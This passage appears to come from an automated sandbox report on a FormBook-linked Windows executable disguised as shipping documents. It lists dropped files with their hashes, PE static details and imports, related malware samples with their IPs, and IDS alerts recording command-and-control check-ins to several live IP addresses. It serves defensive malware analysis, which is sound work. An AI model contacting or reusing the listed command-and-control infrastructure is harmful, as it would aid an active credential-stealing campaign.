                                                              teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                              • 162.32.169.38
                                                              New Order.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.94
                                                              ESVC-ASNUSlgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              New quotation request.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              need quotations.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              FSd2UlLC6H.elfGet hashmaliciousUnknownBrowse
                                                              • 23.167.178.53
                                                              1YhXFyiSni.dllGet hashmaliciousWannacryBrowse
                                                              • 23.167.182.84

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Temp\745o5K385

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\tzutil.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                              Category:dropped
                                                              Size (bytes):114688
                                                              Entropy (8bit):0.9746603542602881
                                                              Encrypted:false
                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ambiparous

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):289280
                                                              Entropy (8bit):7.990767596855463
                                                              Encrypted:true
                                                              SSDEEP:6144:JonMG50dlwYIXpBu8/x9FboCD2x4LFwqlZuXZp:JIhqvQxxHECG4ZlQX3
                                                              MD5:3A0452B9679C111D44CBC7503531DF2B
                                                              SHA1:5D6FA2BA57215604ABA1CE4263E9480FE378F7B9
                                                              SHA-256:304D1BCA3BA849391726F80F2628EB5F98CD81377D389BB2AD70734938745C52
                                                              SHA-512:4197CD566D72695EC954286678388A95C83A9AED9C3215C05D0F5FA9F571ACD30284E399D2F6CCD17E11D1A402F31BEF9079E71010297D8199C2E03BDCF14427
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:u..JIA3K21T8..JJ.3K61T8J.JJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJ.3K6?K.DX.C...7}...0#9aC9YV&Y'x)+/]$B.6]j*?$aZ%.u.kj5%.$.F;;p8JXJJA3278..*?.w!T..Q3.P..{S,.+.d*-.)..hX-..#"[vVV.8JXJJA3KftT8.YKJ."h1T8JXJJA.K40_9AXJ.E3K61T8JXJ.R3K6!T8J(NJA3.61D8JXHJA5K61T8JXLJA3K61T8:\JJC3K61T8HX..A3[61D8JXJZA3[61T8JXZJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXd>$K?61T..\JJQ3K6iP8JHJJA3K61T8JXJJA.K6QT8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61

                                                              C:\Users\user\AppData\Local\Temp\autBF19.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):289280
                                                              Entropy (8bit):7.990767596855463
                                                              Encrypted:true
                                                              SSDEEP:6144:JonMG50dlwYIXpBu8/x9FboCD2x4LFwqlZuXZp:JIhqvQxxHECG4ZlQX3
                                                              MD5:3A0452B9679C111D44CBC7503531DF2B
                                                              SHA1:5D6FA2BA57215604ABA1CE4263E9480FE378F7B9
                                                              SHA-256:304D1BCA3BA849391726F80F2628EB5F98CD81377D389BB2AD70734938745C52
                                                              SHA-512:4197CD566D72695EC954286678388A95C83A9AED9C3215C05D0F5FA9F571ACD30284E399D2F6CCD17E11D1A402F31BEF9079E71010297D8199C2E03BDCF14427
                                                              Malicious:false
                                                              Preview:u..JIA3K21T8..JJ.3K61T8J.JJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJ.3K6?K.DX.C...7}...0#9aC9YV&Y'x)+/]$B.6]j*?$aZ%.u.kj5%.$.F;;p8JXJJA3278..*?.w!T..Q3.P..{S,.+.d*-.)..hX-..#"[vVV.8JXJJA3KftT8.YKJ."h1T8JXJJA.K40_9AXJ.E3K61T8JXJ.R3K6!T8J(NJA3.61D8JXHJA5K61T8JXLJA3K61T8:\JJC3K61T8HX..A3[61D8JXJZA3[61T8JXZJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXd>$K?61T..\JJQ3K6iP8JHJJA3K61T8JXJJA.K6QT8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.196280787959174
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:DRAFT COPY BL, CI & PL.exe
                                                              File size:1'213'952 bytes
                                                              MD5:0fac19920fd79caf5abd90da55b6a5e9
                                                              SHA1:804e3083eedc496d77ce7a5537fe9aa36ee68bd1
                                                              SHA256:da172efecaad48e51e4fa1907014ed7f7b871bd701d9690c4a5a1f0530e34397
                                                              SHA512:07d91ea27594f080cf04e28f754b6c4f52f2f2bfb105b0bd7c07517cffff32a73da40ea871f08910319394d0e04c6ed0002d533f35a5a610e3f7f82f0eea2df8
                                                              SSDEEP:24576:Yu6J33O0c+JY5UZ+XC0kGso6FapKfQCdhoABOUhGYHoJWY:Su0c++OCvkGs9FapJCdhvphGMY
                                                              TLSH:8645CF22B3DDC360CB669173BF6977016EBF78610630B85B2F980D7DA960172162D7A3
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                              File Icon

                                                              Icon Hash:aaf3e3e3938382a0

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x427dcd
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6756479F [Mon Dec 9 01:27:59 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                              Entrypoint Preview

                                                              Instruction
                                                              call 00007F91C90885BAh
                                                              jmp 00007F91C907B384h
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              push edi
                                                              push esi
                                                              mov esi, dword ptr [esp+10h]
                                                              mov ecx, dword ptr [esp+14h]
                                                              mov edi, dword ptr [esp+0Ch]
                                                              mov eax, ecx
                                                              mov edx, ecx
                                                              add eax, esi
                                                              cmp edi, esi
                                                              jbe 00007F91C907B50Ah
                                                              cmp edi, eax
                                                              jc 00007F91C907B86Eh
                                                              bt dword ptr [004C31FCh], 01h
                                                              jnc 00007F91C907B509h
                                                              rep movsb
                                                              jmp 00007F91C907B81Ch
                                                              cmp ecx, 00000080h
                                                              jc 00007F91C907B6D4h
                                                              mov eax, edi
                                                              xor eax, esi
                                                              test eax, 0000000Fh
                                                              jne 00007F91C907B510h
                                                              bt dword ptr [004BE324h], 01h
                                                              jc 00007F91C907B9E0h
                                                              bt dword ptr [004C31FCh], 00000000h
                                                              jnc 00007F91C907B6ADh
                                                              test edi, 00000003h
                                                              jne 00007F91C907B6BEh
                                                              test esi, 00000003h
                                                              jne 00007F91C907B69Dh
                                                              bt edi, 02h
                                                              jnc 00007F91C907B50Fh
                                                              mov eax, dword ptr [esi]
                                                              sub ecx, 04h
                                                              lea esi, dword ptr [esi+04h]
                                                              mov dword ptr [edi], eax
                                                              lea edi, dword ptr [edi+04h]
                                                              bt edi, 03h
                                                              jnc 00007F91C907B513h
                                                              movq xmm1, qword ptr [esi]
                                                              sub ecx, 08h
                                                              lea esi, dword ptr [esi+08h]
                                                              movq qword ptr [edi], xmm1
                                                              lea edi, dword ptr [edi+08h]
                                                              test esi, 00000007h
                                                              je 00007F91C907B565h
                                                              bt esi, 03h
                                                              jnc 00007F91C907B5B8h

                                                              Rich Headers

                                                              Programming Language:
                                                              • [ASM] VS2013 build 21005
                                                              • [ C ] VS2013 build 21005
                                                              • [C++] VS2013 build 21005
                                                              • [ C ] VS2008 SP1 build 30729
                                                              • [IMP] VS2008 SP1 build 30729
                                                              • [ASM] VS2013 UPD4 build 31101
                                                              • [RES] VS2013 build 21005
                                                              • [LNK] VS2013 UPD4 build 31101

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5fda0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1270000x711c.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0xc70000x5fda00x5fe008d3031408a9e39d00d7906e2034716c2False0.9317068326271186data7.902296630790876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x1270000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                              RT_RCDATA0xcf7b80x57067data1.0003254267719628
                                                              RT_GROUP_ICON0x1268200x76dataEnglishGreat Britain0.6610169491525424
                                                              RT_GROUP_ICON0x1268980x14dataEnglishGreat Britain1.25
                                                              RT_GROUP_ICON0x1268ac0x14dataEnglishGreat Britain1.15
                                                              RT_GROUP_ICON0x1268c00x14dataEnglishGreat Britain1.25
                                                              RT_VERSION0x1268d40xdcdataEnglishGreat Britain0.6181818181818182
                                                              RT_MANIFEST0x1269b00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                              Imports

                                                              DLLImport
                                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                              PSAPI.DLLGetProcessMemoryInfo
                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                              UxTheme.dllIsThemeActive
                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishGreat Britain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-09T09:11:03.518511+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449797217.160.0.11380TCP
                                                              2024-12-09T09:11:06.236207+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449804217.160.0.11380TCP
                                                              2024-12-09T09:11:08.904181+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449811217.160.0.11380TCP
                                                              2024-12-09T09:11:28.652905+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449858154.90.58.20980TCP
                                                              2024-12-09T09:11:31.308929+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449864154.90.58.20980TCP
                                                              2024-12-09T09:11:33.980808+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449871154.90.58.20980TCP
                                                              2024-12-09T09:11:44.002220+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44989738.181.21.17880TCP
                                                              2024-12-09T09:11:46.696987+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44990438.181.21.17880TCP
                                                              2024-12-09T09:11:49.471268+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44991238.181.21.17880TCP
                                                              2024-12-09T09:12:08.371814+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44995823.167.152.4180TCP
                                                              2024-12-09T09:12:11.033303+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44996723.167.152.4180TCP
                                                              2024-12-09T09:12:13.701206+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44997323.167.152.4180TCP
                                                              2024-12-09T09:12:24.090048+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449997103.75.185.2280TCP
